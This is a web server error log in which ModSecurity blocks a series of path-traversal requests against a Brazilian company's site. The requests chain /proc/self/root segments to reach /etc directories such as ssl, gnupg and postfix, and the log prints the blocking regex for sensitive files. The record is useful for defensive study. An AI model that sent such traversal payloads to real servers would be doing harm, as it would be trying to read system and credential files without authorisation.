[Tue Mar 17 09:05:28.464956 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:54382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDiNCmCSWTlPouqorHxwAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:29.656717 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:54392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDidCmCSWTlPouqorHyAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:30.941626 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.241.46:54408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDipqmL8PQht4WJFlDuAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:32.194997 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.241.46:54414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDjJqmL8PQht4WJFlDuQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:33.534716 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.241.46:54420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDjZqmL8PQht4WJFlDugAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:34.671346 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.241.46:54430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDju82sZHvlq4xgHq_nwAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:35.960877 2026] [:error] [pid 7000:tid 140411658000128] [client 74.7.241.46:54446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDjxePVOt35XCGZP8sNAAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:37.173133 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.241.46:54458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDke82sZHvlq4xgHq_oAAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:38.472734 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.241.46:44476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDkpDEJR9VXonE_-1KegAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:39.644825 2026] [:error] [pid 11469:tid 140411733534464] [client 74.7.241.46:44488] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDk5DEJR9VXonE_-1KfgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:40.960601 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:44490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDlJDEJR9VXonE_-1KggAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:42.147458 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.241.46:44498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDlpDEJR9VXonE_-1KhAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:43.479906 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:44502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDlwQohV2v-7oj5HH3egAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:44.648492 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:44518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDmAQohV2v-7oj5HH3ewAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:44.794093 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:43880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDmAeiSKl8TjouI-b_CQAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:05:45.963195 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.241.46:44522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDmaBJNF7axNlVR0X5gwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:47.143159 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:44534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDm6BJNF7axNlVR0X5hwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:48.469701 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:60940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDnJDEJR9VXonE_-1KjQAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:49.619139 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:60956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDnZDEJR9VXonE_-1KkAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:50.967697 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.241.46:60968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDngQohV2v-7oj5HH3fgAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:52.188626 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:60980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDoKBJNF7axNlVR0X5jQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
